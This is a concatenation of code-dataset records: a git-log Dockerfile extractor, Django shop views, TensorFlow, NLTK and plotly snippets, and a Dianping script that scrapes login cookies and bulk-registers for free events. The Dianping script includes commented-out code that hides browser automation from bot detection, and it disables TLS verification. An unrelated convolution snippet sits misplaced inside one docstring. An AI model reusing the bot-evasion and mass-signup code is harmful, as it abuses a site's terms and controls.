f'./{PATH_OF_GITCLONE}/{repository}/'\n\n # ignore utf-8 Error\n txtGitFileStatus = subprocess.run(list(command.split()), cwd=cwd, encoding='utf-8', stdout=subprocess.PIPE, errors=\"ignore\")\n txtGitFileStatus = str(txtGitFileStatus.stdout)\n\n with open(f'{PATH_OF_GITLOGTXT}/{repository}.txt', 'w') as f:\n f.write(txtGitFileStatus)\n \n # error handling\n if txtGitFileStatus == \"\":\n with open(PATH_OF_ERROR_GITLOG, 'a+') as f:\n f.seek(0)\n if not repository in f.read():\n f.write(f\"fatal: your current branch 'master' does not have any commits yet -> {repository}\\n\")\n\n return False\n\n return txtGitFileStatus\n\n\"\"\"\noutputCSV\n> CommitID\n> Author\n> Date\n> Dockerfiles\n> Status\n\"\"\"\n\ndef appendToResult(result, tmp, status, dockerfile, merge_from):\n result[\"CommitID\"].append(tmp[\"CommitID\"])\n result[\"Author\"].append(tmp[\"Author\"])\n result[\"Date\"].append(tmp[\"Date\"])\n result[\"Dockerfile\"].append(dockerfile)\n result[\"Status\"].append(status)\n\n \"\"\"\n When identifying committers:\n the commit history shown on the GitHub page does not include merge commits,\n so this flag is added because merges must be excluded when building the committer list.\n 
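The convolution loop above implements y[n] = sum over k of x[k]*h[n-k] within the valid index range; a quick cross-check against numpy's built-in:

```python
import numpy as np

x = np.array([1.0, 2.0, 3.0])
h = np.array([0.0, 1.0, 0.5])
manual = [sum(x[k] * h[n - k]
              for k in range(len(x)) if 0 <= n - k < len(h))
          for n in range(len(x) + len(h) - 1)]
assert np.allclose(manual, np.convolve(x, h))  # full convolution, length m+n-1
```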
\"\"\"\n if merge_from == \"no-merge\":\n result[\"Merged?\"].append(False)\n else:\n result[\"Merged?\"].append(True)\n\n return result\n\ndef appendRevisionFile(revisionFileList, commitid, filename):\n revisionFile = f\"{commitid}:{filename}\"\n if revisionFile in revisionFileList:\n return revisionFileList\n else:\n revisionFileList.append(revisionFile)\n return revisionFileList\n\n\ndef saveRevisonFileToShow(revisionFileList, repository):\n txt = '\\n'.join(revisionFileList)\n with open(f\"./{PATH_OF_GITSHOWLIST}/{repository}.txt\", \"w\") as f:\n f.write(txt)\n\n\ndef RevisionsHaveDocker(repository, txtGitFileStatus):\n result = { \"CommitID\":[], \"Author\":[], \"Date\":[], \"Dockerfile\":[], \"Status\":[], \"Merged?\":[]}\n tmp = { \"CommitID\":\"\", \"Author\":\"\", \"Date\":\"\" }\n merge = [None, None]\n merge_from = \"no-merge\"\n revisionFileList = []\n\n for i, txt in enumerate(txtGitFileStatus.splitlines()):\n if txt[:6] == \"commit\":\n tmp[\"CommitID\"] = txt[7:47]\n if \"from\" in txt[47:]:\n merge_from = txt[54:94]\n merge = [None, None]\n else:\n merge_from = \"no-merge\"\n\n elif txt[:6] == \"Merge:\":\n # Master, Dev\n merge = txt[7:].split()\n\n elif txt[:7] == \"Author:\":\n tmp[\"Author\"] = txt[8:]\n elif txt[:7] == \"Commit:\":\n # Author と Commiter が異なる場合があり,コミット人数を把握するために複数人を記載するようにした\n if tmp[\"Author\"] != txt[8:]:\n tmp[\"Author\"] += f\"\\n{txt[8:]}\"\n elif txt[:11] == \"CommitDate:\":\n tmp[\"Date\"] = txt[12:]\n\n elif (\"Dockerfile\" == txt[-10:]) or (\"dockerfile\" == txt[-10:]):\n # masterの変更のみ取得\n if (merge_from != \"no-merge\") and (merge_from.startswith(merge[1])):\n continue\n\n if txt[0] != \" \":\n if txt[0] == \"R\":\n status = f\"{txt[0]}\"\n dockerfile = f\"{txt.split()[1]} {txt.split()[2]}\"\n result = appendToResult(result, tmp, status, dockerfile, merge_from)\n # いつ削除されたかを明確にするため、R100 でも取得する\n revisionFileList = appendRevisionFile(revisionFileList, tmp[\"CommitID\"], txt.split()[2])\n else:\n status = f\"{txt[0]}\"\n dockerfile = f\"{txt.split()[1]}\"\n result = appendToResult(result, tmp, status, dockerfile, merge_from)\n if txt[0] != \"D\":\n revisionFileList = appendRevisionFile(revisionFileList, tmp[\"CommitID\"], txt.split()[1])\n\n result = pd.DataFrame.from_dict(result)\n result.to_csv(f\"./{PATH_OF_GITLOGCSV}/{repository}.csv\")\n\n saveRevisonFileToShow(revisionFileList, repository)\n\n\n\n\nif __name__ == \"__main__\":\n repositories = os.listdir(PATH_OF_GITCLONE)\n count = 0\n\n for repository in tqdm(repositories):\n\n if not isTargetRepository(repository):\n continue\n\n txtGitFileStatus = GitlogFileStatus(repository)\n if not txtGitFileStatus:\n continue\n\n RevisionsHaveDocker(repository, txtGitFileStatus)\n\n\n","sub_path":"2-git_log_extractDockerfile.py","file_name":"2-git_log_extractDockerfile.py","file_ext":"py","file_size_in_byte":5771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"363229283","text":"class Solution:\n # @param s, a string\n # @param dict, a set of string\n # @return a boolean\n def wordBreak(self, s, dict):\n status = [False] * (len(s) + 1)\n status[0] = True\n i = 0\n while i < len(s)+1:\n j = 0\n while j < i:\n if status[j] and s[j:i] in dict:\n status[i] = True\n break\n j += 1\n i += 1\n return status[-1]\n","sub_path":"word_break.py","file_name":"word_break.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"118448584","text":"import math\n\nfrom 
repositories.product import ProductRepository\nfrom repositories.image import ImageRepository\nfrom repositories.price import PriceRepository\nfrom entities.product import ProductEntity\nfrom entities.image import ImageEntity\nfrom entities.price import PriceEntity\n\n\nclass PriceService:\n\n    @classmethod\n    def update(cls):\n        # clear by supplier\n        PriceRepository.clear_price_by_supplier(supplier='АЙТИ')\n\n        # get products count\n        products_count = ProductRepository.get_active_products_count()\n\n        # get products list\n        offset = 0\n        limit = 10000\n        steps = math.ceil(products_count / limit)\n\n        for step in range(steps):\n            offset = limit*step\n            product_entities = ProductRepository.get_products(limit=limit, offset=offset)\n\n            price_entities = [PriceEntity(\n                _article=product_entity.part,\n                _kod=product_entity.sku,\n                _name=product_entity.name,\n                _cena=product_entity.price,\n                _valuta='RUB',\n                _nalichie=product_entity.quantity,\n                _postavchik='АЙТИ',\n                _img=product_entity.url,\n            ) for product_entity in product_entities]\n\n            # create\n            PriceRepository.create(price_entities=price_entities)","sub_path":"services/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"129665026","text":"# -*- coding: utf-8 -*-\nfrom time import sleep\n\nimport requests\nfrom lxml import etree\nfrom selenium import webdriver\nfrom selenium.webdriver import ChromeOptions\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\n# Log in to the site via the QR-code page (the captcha login flow was never cracked)\ndef login_web():\n    \"\"\"\n    :return: cookies of the logged-in session\n    \"\"\"\n    chromePath = '/Users/pasca/Desktop/github/MySpiderTool/chromedriver'\n    options = ChromeOptions()  # instantiate a ChromeOptions object\n    options.add_experimental_option('excludeSwitches', ['enable-automation'])  # add the option as a key-value pair\n    driver = webdriver.Chrome(executable_path=chromePath, chrome_options=options)\n    driver.get('https://account.dianping.com/login?redir=http%3A%2F%2Fwww.dianping.com%2F')\n    timeout = WebDriverWait(driver, 10)  # define the wait timeout\n    timeout.until(EC.frame_to_be_available_and_switch_to_it(\n        (By.XPATH, '//*[@id=\"J_login_container\"]/div/iframe')))  # switch into the login iframe\n    WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.CLASS_NAME, 'qrcode-img')))  # wait for the QR code, to confirm the login page loaded\n    driver.switch_to.default_content()  # switch back out of the iframe\n    WebDriverWait(driver, 180).until(EC.presence_of_element_located((By.XPATH, '/html/body/div[1]/div[2]/div[1]/div[2]')))  # continue once the QR-code login has completed\n    sleep(40)\n    # timeout.until(EC.element_to_be_clickable((By.CLASS_NAME, 'bottom-password-login'))).click()  # click \"account login\"\n    # # timeout.until(EC.element_to_be_clickable((By.ID, 'tab-account'))).click().click()  # click phone/password login\n    # driver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\n    #     \"source\": \"\"\"Object.defineProperty(navigator, 'webdriver', {get: () => undefined})\"\"\",\n    # })\n    #\n    # phone = input('请输入手机号码:')\n    # # locate the phone-number input box\n    # username = timeout.until(EC.presence_of_element_located((By.ID, 'mobile-number-textbox')))\n    # for data in list(phone):\n    #     username.send_keys(data)\n    #     sleep(1)\n    # driver.find_element_by_xpath(r'//*[@id=\"send-number-button\"]').click()\n    # key = input('请输入验证码:')\n    # driver.find_element_by_xpath(r'//*[@id=\"number-textbox\"]').send_keys(key)\n    # # click \"get verification code\"\n    # timeout.until(EC.presence_of_element_located((By.ID, 'send-number-button'))).click()\n    # # click login\n    # sleep(random.uniform(0, 1))\n    # driver.find_element_by_xpath('//button[@id=\"login-button-account\"]').click()\n\n    cookie = driver.get_cookies()\n    cookies = {}\n    for each in cookie:\n        cookies[each['name']] = each['value']  # convert the cookie list into a plain dict\n    return cookies\n\n\n# Sign up for an activity\ndef apply_project(offlineActivityId, branchId, applyPhone):\n    data = {\n        'offlineActivityId': offlineActivityId,\n        'phoneNo': applyPhone,\n        'shippingAddress': '',\n        'extraCount': '',\n        'birthdayStr': '',\n        'email': '',\n        'marryDayStr': '',\n        'babyBirths': '',\n        'pregnant': '',\n        'marryStatus': '0',\n        'comboId': '',\n        'branchId': branchId,\n        'usePassCard': '0',\n        'passCardNo': '',\n        'isShareSina': 'false',\n        'isShareQQ': 'false'\n    }\n\n    response = requests.post('http://s.dianping.com/ajax/json/activity/offline/saveApplyInfo', headers=headers,\n                             cookies=cookies,\n                             data=data, verify=False).json()\n    return response\n\n\n# Get the branch ID\ndef get_branch(offlineActivityId):\n    data = {\n        'offlineActivityId': offlineActivityId\n    }\n    url = 'http://s.dianping.com/ajax/json/activity/offline/loadApplyItem'\n\n    response = requests.post(url=url, headers=headers,\n                             cookies=cookies,\n                             data=data, verify=False).json()\n    code = response.get('code')\n    msg = response.get('msg')\n    html = msg.get('html')\n    if code == 500:\n        return '', '', html\n    else:\n        htmlData = etree.HTML(html)\n        branchId = htmlData.xpath('//div/ul/li[2]/select/option[2]/@value')[\n            0]  # attribute content: /li/a/@href ; text content: /li/a/text()\n        branchName = htmlData.xpath('//div/ul/li[2]/select/option[2]/text()')[\n            0]  # attribute content: /li/a/@href ; text content: /li/a/text()\n        return branchId, branchName, '报名成功'\n\n\n# Get the phone number\ndef get_phone(offlineActivityId):\n    data = {\n        'offlineActivityId': offlineActivityId\n    }\n    url = 'http://s.dianping.com/ajax/json/activity/offline/loadApplyItem'\n\n    response = requests.post(url=url, headers=headers,\n                             cookies=cookies,\n                             data=data, verify=False).json()\n    code = response.get('code')\n    msg = response.get('msg')\n    html = msg.get('html')\n    if html == \"您已经参与过了\" or not html:\n        return None\n    else:\n        htmlData = etree.HTML(html)\n        applyPhone = htmlData.xpath('//div/ul/li/input/@value')  # attribute content: /li/a/@href ; text content: /li/a/text()\n        # print(applyPhone)\n        return applyPhone\n\n# Fetch the list of free-food activities\ndef free_food_list():\n    for page in range(1, 30):\n        data = '{\"cityId\":\"1\",\"type\":0,\"mode\":\"\",\"page\":%s}' % page  # type 1: food, type 2: beauty, type 6: entertainment\n        ajaxListURL = 'http://m.dianping.com/activity/static/pc/ajaxList'\n        response = requests.post(url=ajaxListURL, headers=headers1,\n                                 cookies=cookies,\n                                 data=data, verify=False).json()\n        if response.get('code') == 200:\n            data = response.get('data')\n            detail = data.get('detail')\n            offlineActivityId = detail[0].get('offlineActivityId')  # extra call, added just to fetch the phone number\n            applyPhone = get_phone(offlineActivityId)\n            for i in range(len(detail)):\n                branchId = ''\n                offlineActivityId = detail[i].get('offlineActivityId')\n                detailUrl = detail[i].get('detailUrl')\n                activityTitle = detail[i].get('activityTitle')\n                applyResponse = apply_project(offlineActivityId, branchId, applyPhone)\n                code = applyResponse.get('code')\n                msg = applyResponse.get('msg')\n                html = msg.get('html') if msg else None\n                if code == 200:\n                    print(detailUrl, activityTitle, '报名成功!')\n                elif code == 500 and html == \"请选择分店\":\n                    branchId, branchName, infoRes = get_branch(offlineActivityId)\n                    apply_project(offlineActivityId, branchId, applyPhone)\n                    print(detailUrl, activityTitle, branchName, infoRes)\n                elif code == 500 and msg is None:\n                    print(detailUrl, activityTitle, '报名异常')\n                else:\n                    print(detailUrl, activityTitle, html)\n        else:\n            print(response.get('errorMsg'))\n\n\nif __name__ == '__main__':\n    cookies = login_web()\n    print(cookies)\n    headers1 = {\n        'Connection': 'keep-alive',\n        'Pragma': 'no-cache',\n        'Cache-Control': 'no-cache',\n        'Accept': 'application/json, text/javascript, */*; q=0.01',\n        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36',\n        'Content-Type': 'application/json',\n        # 'Cookie': cookies,\n        'Origin': 'http://s.dianping.com',\n        'Referer': 'http://s.dianping.com/',\n        'Accept-Language': 'zh-CN,zh;q=0.9',\n    }\n    headers = {\n        'Connection': 'keep-alive',\n        'Pragma': 'no-cache',\n        'Cache-Control': 'no-cache',\n        'Accept': 'application/json, text/javascript',\n        'X-Requested-With': 'XMLHttpRequest',\n        'X-Request': 'JSON',\n        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36',\n        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8;',\n        'Origin': 'http://s.dianping.com',\n        # 'Cookie': cookies,\n        # 'Referer': 'http://s.dianping.com/event/2123372828',\n        'Accept-Language': 'zh-CN,zh;q=0.9'\n    }\n    free_food_list()","sub_path":"dianPingFreeFood.py","file_name":"dianPingFreeFood.py","file_ext":"py","file_size_in_byte":8584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"165311598","text":"import datetime\nfrom django.shortcuts import redirect, render, get_list_or_404, render_to_response\nfrom ecommerce.models import *\n\n# Create your views here.\n\ndef index(request):\n    \"\"\"\n    View invoked when the product list page (/ec/list/) is requested.\n    Returns the product information.\n    \"\"\"\n\n    products = get_list_or_404(Product)\n\n    # Define the list that stores the cart contents in the session.\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n\n    response = render(request, 'product_list.html', {'products': products})\n\n    return response\n\ndef cart_add(request, product_id):\n    \"\"\"\n    View invoked when adding a given product to the cart.\n    Appends the product's ID to the cart (session).\n    \"\"\"\n\n    # Add the product to the cart (session).\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n\n    cart = request.session['cart']\n\n    if any([item['product_id'] == product_id for item in cart]):\n        item = [item for item in cart if item['product_id'] == product_id][0]\n        item['count'] = str(int(item['count']) + int(request.POST['count']))\n    else:\n        cart.append({\n            'product_id': product_id,\n            'count': request.POST['count'],\n        })\n\n    request.session['cart'] = cart\n\n    products = get_list_or_404(Product)\n\n    response = redirect('/ec/list/', {'products': products})\n\n    return response\n\ndef cart_delete(request, product_id):\n    \"\"\"\n    View invoked when removing a given product from the cart.\n    Removes the product's ID from the cart (session).\n    \"\"\"\n\n    # Remove the specified product from the cart (session).\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n    cart = request.session['cart']\n    # If the same product is in the list more than once, remove every entry with the given ID\n    cart = [item for item in cart if item['product_id'] != str(product_id)]\n    request.session['cart'] = cart\n\n    products = get_list_or_404(Product)\n\n    response = redirect('/ec/list/', {'products': products})\n\n    return response\n\n\ndef cart_reset(request):\n    \"\"\"\n    View executed when \"empty the cart\" is clicked.\n    Empties the contents of the cart (session).\n    \"\"\"\n\n    # Remove every product from the cart (session).\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n    del request.session['cart']\n\n    products = get_list_or_404(Product)\n\n    response = redirect('/ec/list/', {'products': products})\n\n    return response\n\ndef cart_list(request):\n    \"\"\"\n    View executed when the cart contents page is displayed.\n    Returns the information of the products in the cart.\n    \"\"\"\n\n    # Get the product IDs stored in the cart (session).\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n    cart = request.session['cart']\n\n    # Get the information of the products in the cart\n    products = Product.objects.filter(id__in=[item['product_id'] for item in cart])\n\n    details = []\n\n    for product in products:\n        details.append({\n            'product': product,\n            'count': [item for item in cart if item['product_id'] == str(product.id)][0]['count']\n        })\n\n    return render(request, 'cart_list.html', {'details': details})\n\ndef order(request):\n    \"\"\"\n    View executed when the order page is displayed.\n    Returns the products in the cart, the payment methods, and the order page.\n    \"\"\"\n\n    # Get the product IDs stored in the cart (session).\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n    cart = request.session['cart']\n\n    # Get the information of the products in the cart\n    products = Product.objects.filter(id__in=[item['product_id'] for item in cart])\n\n    # Get the payment methods.\n    payments = get_list_or_404(Payment)\n\n    details = []\n    total = 0\n\n    for product in products:\n        count = [item for item in cart if item['product_id'] == str(product.id)][0]['count']\n        subtotal = int(product.price) * int(count)\n        total += subtotal\n        details.append({\n            'product': product,\n            'count': count,\n            'subtotal': subtotal\n        })\n\n    return render(request, 'order.html', {'details': details, 'payments': payments, 'total': total})\n\ndef order_execute(request):\n    \"\"\"\n    View executed when the order page is POSTed.\n    Saves the customer information and the ordered products.\n    \"\"\"\n\n    # Save the submitted customer information.\n    customer = Customer(first_name=request.POST['first_name'],\n                        last_name=request.POST['last_name'],\n                        postal_code=request.POST['postal_code'],\n                        prefecture=request.POST['prefecture'],\n                        city=request.POST['city'],\n                        street1=request.POST['street1'],\n                        street2=request.POST['street2'],\n                        tel=request.POST['tel'],\n                        email=request.POST['email'])\n    customer.save()\n\n    # Get the Payment object.\n    payment = Payment.objects.get(id=int(request.POST['payment']))\n\n    # Save the order information.\n    order = Order(customer=customer, payment=payment)\n    order.save()\n\n    # Get the product IDs stored in the cart (session).\n    if not request.session.has_key('cart'):\n        request.session['cart'] = list()\n    cart = request.session['cart']\n\n    # Get the information of the products in the cart\n    products = Product.objects.filter(id__in=[item['product_id'] for item in cart])\n\n    for product in products:\n        order_product = Order_Product(order=order, product=product, count=1, price=product.price)\n        order_product.save()\n\n    # Redirect to the order-complete page.\n    return redirect('/ec/order_complete/')\n\ndef order_complete(request):\n    \"\"\"\n    View executed when an order completes.\n    Returns the order-complete page.\n    \"\"\"\n\n    response = render_to_response('order_complete.html')\n\n    # Delete the contents of the cart\n    if request.session.has_key('cart'):\n        del request.session['cart']\n    return response\n\ndef good_add(request, product_id):\n    \"\"\"\n    The \"like\" button!\n    \"\"\"\n\n    product = Product.objects.filter(id__in=product_id).first()\n    product.good += 1\n    product.save()\n\n    products = get_list_or_404(Product)\n\n    response = redirect('/ec/list/', {'products': products})\n\n    return response\n\ndef cat_filter(request):\n    \"\"\"\n    View invoked when a category link is clicked on the product list page (/ec/list/).\n    Returns the product information filtered by category.\n    \"\"\"\n\n    # Get the category\n    message = request.GET.get('cat', 1)\n\n    # Filter the product list by the specified category\n    products = Product.objects.filter(category=message)\n\n    response = render(request, 'product_list.html', {'products': products})\n\n    return
response\n","sub_path":"ecommerce_website/ecommerce/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"44446015","text":"from django.db import models\n\nNetwork_choices = (\n    ('airtel', 'Airtel'),\n    ('vodafone', 'Vodafone'),\n    ('docomo', 'Docomo'),\n    ('idea', 'Idea'),\n)\n\nclass Clients(models.Model):\n    #auto_increment_id = models.AutoField(primary_key=True)\n    name = models.CharField(max_length=20)\n    mob_no = models.BigIntegerField()\n    network = models.CharField(max_length=20, choices = Network_choices, default='new')\n    date = models.DateTimeField('date created', auto_now_add = True)\n    dob = models.DateField()\n\n    def __str__(self):\n        return self.name\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"146894680","text":"import tensorflow as tf\n\nassert tf.__version__ == \"1.8.0\"\ntf.set_random_seed(20180130)\n\nsess = tf.Session()\n\n\ndef add_to_batch(image):\n    print('Adding to batch')\n    image_batch = tf.train.shuffle_batch([image], batch_size=5, capacity=11, min_after_dequeue=1, num_threads=1)\n\n    # Add to summary\n    tf.summary.image('images', image_batch)\n\n    return image_batch\n\n\ndef get_batch():\n    # Create filename queue of images to read\n    filenames = [\"sample.jpg\" for _ in range(11)]\n    filename_queue = tf.train.string_input_producer(filenames)\n    reader = tf.WholeFileReader()\n    key, value = reader.read(filename_queue)\n\n    # Read and process image\n    my_image = tf.image.decode_png(value)\n    my_image_float = tf.cast(my_image, tf.float32)\n    image_mean = tf.reduce_mean(my_image_float)\n    my_noise = tf.random_normal([959, 959, 3], mean=image_mean)\n    my_image_noisy = my_image_float + my_noise\n    print('Reading images')\n\n    return add_to_batch(my_image_noisy)\n\n\ndef main():\n    sess.run(tf.initialize_all_variables())\n    writer = tf.summary.FileWriter('./summary_logs', graph_def=sess.graph_def)\n    images = get_batch()\n    tf.train.start_queue_runners(sess=sess)\n    merged = tf.summary.merge_all()\n    summary_str = sess.run(merged)\n    writer.add_summary(summary_str)\n    print(\"Start training\")\n\n\nmain()\n","sub_path":"StackOverflow/APIM-25/35714832-fix/batches.py","file_name":"batches.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"644060125","text":"from nltk.tokenize import RegexpTokenizer\nfrom nltk.corpus import stopwords\nimport re\nimport nltk\nimport gensim\nimport pickle\nfrom collections import Counter\n\ntokenizer = RegexpTokenizer(r'\\w+')\nnltk.data.path.append(\"data\")\n\n\n# Add new stop words to those already provided by the nltk library\ndef stop_word(other_stop=None):\n    word = stopwords.words('italian')\n    word = word + stopwords.words('english')\n    word += ['il', 'di', 'e', 'a', 'un', 'in', 'che', 'non', 'si', 'da', 'lo', 'per', 'con', 'ma', 'come', 'su', 'mi',\n             'anche', 'o',\n             'io', 'se', 'perché', 'li', 'ci', 'ne', 'lei', 'ancora', 'tu', 'lui', 'senza', 'bene', 'cui', 'chi', 'già',\n             'dopo',\n             'uno', 'noi', 'dove', 'qui', 'no', 'allora', 'tra', 'vi', 'ora', 'fra', 'prima', 'forse', 'sì', 'sotto',\n             'voi',\n             'fino', 'oggi', 'quasi', 'pure', 'egli', 'mentre', 'contro', 'invece', 'esso', 'là', 'però', 'né',\n             'subito', 'verso',\n             'ciò', 'ecco', 'loro', 'essa', 'fuori', 'meno', 'adesso', 'niente', 'cioè', 'male',
'nulla', 'ah', 'oh',\n             'quindi', 'appena',\n             'insieme', 'dunque', 'dentro', 'durante', 'almeno', 'secondo', 'anzi', 'oramai', 'oltre', 'intorno',\n             'sopra', 'dietro',\n             'davanti', 'soltanto', 'infatti', 'qualcosa', 'spesso', 'accordo', 'ieri', 'davvero', 'lì', 'qualcuno',\n             'avanti', 'assai',\n             'presto', 'qua', 'domani', 'circa', 'giù', 'soprattutto', 'nemmeno', 'grazie', 'tuttavia', 'appunto',\n             'neppure', 'eh',\n             'veramente', 'tardi', 'insomma', 'presso', 'intanto', 'lungo', 'neanche', 'piuttosto', 'stasera', 'perciò',\n             'naturalmente',\n             'accanto', 'eppure', 'eccetera', 'finalmente', 'infine', 'poiché', 'comunque', 'dinanzi', 'abbastanza',\n             'peccato',\n             'certamente', 'coloro', 'attorno', 'magari', 'oppure', 'inoltre', 'indietro', 'addosso', 'addirittura',\n             'finché', 'perfino',\n             'affatto', 'stamattina', 'completamente', 'probabilmente', 'chissà', 'sino', 'ognuno', 'entro', 'così',\n             'quindi', 'far',\n             'aver', 'fare', 'avere', 'essere', 'come', 'gennaio', 'febbraio', 'marzo', 'aprle', 'maggio', 'giugno',\n             'luglio', 'agosto',\n             'settembre', 'ottobre', 'novembre', 'dicembre', 'umomo', 'donna', 'italia', 'cosa', 'anno', 'volta',\n             'italia', 'italiano',\n             'italiana', 'uno', 'due', 'tre', 'quattro', 'cinque', 'sei', 'sette', 'otto', 'nove', 'dieci', 'solo',\n             'dopo',\n             'quale', 'quali', 'questo', 'quello', 'quelli', 'quelle', 'con', 'anni', 'può', 'poi', 'mai', 'quando',\n             'dove',\n             'molto', 'stata', 'sempre', 'nuovo', 'nuova', 'mila', 'via', 'stai', 'fatto', 'far', 'fare', 'fanno',\n             'dice', 'dire',\n             'detto', 'stati', 'stato', 'persone', 'parte', 'proprio', 'ogni', 'primo', 'secondo', 'minuto', 'vita',\n             'alcuni', 'ore', 'altri', 'quel', 'poco', 'italiano', 'modo', 'potrebbe', 'altra', 'tutta', 'tutto',\n             'tutte', 'mesi', 'posto', 'deve', 'devono', 'dover', 'dato', 'dati', 'visto', 'visti', 'casa', 'grandi',\n             'state', 'italiani', 'ultimo', 'qualche', 'continua', 'news']\n    if other_stop is not None:\n        word += other_stop\n    return list(set(word))\n\n\n# Function that receives a text and returns it without stop words, dropping short words (length <= 2)\n# and non-letter characters\ndef delete_word(text, other_stop=None):\n    text = re.sub('[^a-zA-Zàèìòùé]', ' ', text)\n    text = text.lower()\n    stop = stop_word(other_stop=other_stop)\n    token = tokenizer.tokenize(text)\n    token = [x for x in token if x not in stop and len(x) > 2]\n    text = ' '.join(token)\n\n    return text\n\n\n# Function that joins words that frequently occur together as a pair (e.g. new york)\ndef bigram_text(titles):\n    # a token is a single word\n    token = [tokenizer.tokenize(x) for x in titles]\n    bigram = gensim.models.Phrases(token, min_count=10, threshold=20)\n    trigram = gensim.models.Phrases(bigram[token], min_count=10, threshold=20)\n    trigram_mod = gensim.models.phrases.Phraser(trigram)\n    token = [trigram_mod[x] for x in token]\n    titles = [' '.join(x) for x in token]\n    pickle.dump(trigram_mod, open(\"C:\\\\Users\\\\andre\\\\PycharmProjects\\\\prove\\\\Training Testing - Bucket - Classificazione Bayesiana\\\\news_category\\model.pickle\", 'wb'))\n    return titles\n","sub_path":"text_cleaning.py","file_name":"text_cleaning.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"539115603","text":"\n# range(5) provides an iteration of sequential numbers, from 0 to 4.\nfor var in list(range(5)):\n    print (var)\n\nfor letter in 'Python': # traversal of a string sequence\n    print ('Current Letter :', letter)\nprint()\nfruits = ['banana', 'apple', 'mango']\nfor fruit in fruits: # traversal of List sequence\n    print ('Current fruit :', fruit)\n\n# iterating using the sequence index\nfruits = ['banana', 'apple', 'mango']\nfor index in range(len(fruits)):\n    print ('Current fruit :', fruits[index])\n\n# using else with a for loop\nnumbers=[11,33,55,39,55,75,37,21,23,41,13]\nfor num in numbers:\n    if num%2==0:\n        print ('the list contains an even number')\n        break\nelse:\n    print ('the list does not contain an even number')\n\n\n# Nested for loop\n# end=' ' makes print output a space instead of a newline after each value\nfor i in range(1,11):\n    for j in range(1,11):\n        k=i*j\n        print (k, end=' ')\n    print()","sub_path":"controlstatements/loops_for.py","file_name":"loops_for.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"368084514","text":"import numpy as np\nimport plotly.graph_objs as go\n\n# Create random data with numpy\nN = 1000\nrandom_x = np.random.randn(N)\nrandom_y = np.random.randn(N)\n\n# Create a trace\ntrace = go.Scatter(\n    x = random_x,\n    y = random_y,\n    mode = 'markers'\n)\ndata = [trace]\nfig = go.Figure(data=data)\nfig.write_html('scatter.html', auto_open=True)\n#fig.show()","sub_path":"week8/scatter.py","file_name":"scatter.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"947968","text":"# Exceptions\n\n# Understanding exceptions\n\n# When an error is detected, the interpreter can no longer continue executing and instead prints an error message; this is what is called an exception\n\n# Writing exception handlers\n\n# Syntax\n# try:\n#     code that might raise an error\n# except:\n#     code executed if an exception occurs\n\n# Requirement: try to open the file in read-only mode; if the file does not exist, open it in write mode\ntry:\n    f = open('Test.txt','r')\nexcept:\n    f = open('Test.txt','w')\n\n# Understanding exception types\n\n# Exception type NameError\n# print(name)\n\n#ZeroDivisionError\n# print(1/0)","sub_path":"Read-Search-Ask/Python/黑马2020/1-Python核心编程/2-面向对象编程/7-异常使用/1-了解异常.py","file_name":"1-了解异常.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"82193296","text":"from flask import Flask, render_template\nimport cbpy as cb\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n    y = cb.gmatchlist()\n    dlist = list()\n    for x in y:\n        if x not in dlist:\n            dlist.append(x)\n\n    return render_template('index.html', y=y, dlist=dlist)\n\n\n@app.route('/about', methods=['GET', 'POST'])\ndef bout():\n
